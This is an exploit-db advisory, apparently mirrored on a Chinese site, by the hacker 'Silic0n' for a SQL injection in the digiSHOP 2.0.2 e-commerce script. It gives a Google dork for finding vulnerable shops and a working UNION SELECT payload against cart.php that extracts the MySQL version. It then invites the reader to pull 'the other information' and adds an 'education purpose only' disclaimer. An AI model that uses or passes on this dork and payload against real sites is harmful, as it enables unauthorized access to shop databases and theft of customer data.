digiSHOP 2.0.2 – SQL Injection

  • 作者: Silic0n
    日期: 2010-11-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15405/
  •  
-----------------------------------
		 TM	|
___ __________ 	|
 | Y | ______ | |	|
 |.1 ||______||.| | |	|
 |._ |`-|.|-'	|
 |:| ||:|	|
 |::.|:. ||::.|	|
 `--- ---'`---'	|
	Private Place Of 0days|
-----------------------------------
 
^Exploit Title: 
^Date 	: 23/7/2010
^Vendor Site: http://digishop.digisoft77.com/
^MOD Version: digiSHOP 2.0.2
^Author : Silic0n (science_media017[At]yahoo.com)
^Team Site	: www.hacking-truths.net
^Dork		: inurl:cart.php?m=features&id=
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o, Belma(sweety) ,Danzel, 
messsy , ,abronsius ,Nova ,ConsoleFx , Exi , Beenu , R4cal , jaya ,@ry@n,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/{Shop path}/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7

MySql Version : 4.1.22-log 

Now Use Brain.Exe (7) To extract the Other information 
this exploit is only education Purpose only ,author or team member is not responsible for any harm

------------------------------------------------------------------------------